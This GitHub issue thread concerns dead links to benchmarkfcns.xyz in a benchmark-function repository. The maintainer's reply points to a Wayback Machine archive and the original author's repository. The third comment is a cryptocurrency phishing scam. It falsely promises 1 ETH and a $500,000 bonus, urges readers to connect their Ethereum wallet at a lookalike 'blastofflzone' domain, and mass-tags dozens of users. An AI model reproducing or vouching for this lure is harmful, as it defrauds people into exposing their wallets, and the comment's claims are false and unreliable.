### ISSUE TITLE
Broke benchmarkfcns.xyz links

### ISSUE THREAD

**Issue by beyarkay** [rdlang/ela_benchmark#2]
Many of the benchmark functions make reference to the domain http://benchmarkfcns.xyz however it seems that this domain has been sold and is (at time of writing) just a placeholder domain. Is there a replacement link?

**Comment by rdlang** [comment]
You can access that domain using the Wayback Machine, for example [here](https://web.archive.org/web/20200430233702/http://benchmarkfcns.xyz/).
The author of that website also has an associated [Github repository](https://github.com/mazhar-ansari-ardeh/BenchmarkFcns) with implementations of the functions in MATLAB.

**Comment by steamyrails** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500,000 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this chance before it's too late!
Alexd14, @seguidor777, @Hansen-chen, @dpwupan, @tmorgan4, @eryk, @benjaminsingleton, @windblood, @blaney83, @nicolaszabatta, @niranjanaryan, @SerialDev, @772435284, @joelowj, @rsvo, @kamabounta, @NotMoni, @smutslab, @ImpulziveMyztik, @Xyvran, @TallSmile, @eom293, @mickybaby, @KuanQi, @konradbachusz, @pseudocodes, @patrickacioli, @dingyufei615, @topkek-issou, @riven314, @pjbruno327, @socrates-yxh, @paulofreitas, @tk42, @SquidRings, @Galaxyjia, @hungha11, @babcockt18, @filipmacek, @amitds1997, @baikeh, @NotF404, @nasgoncalves, @pokersu, @qarth, @drunaar, @xxy-im, @utkuxgok, @tjd-dev, @T-Mook
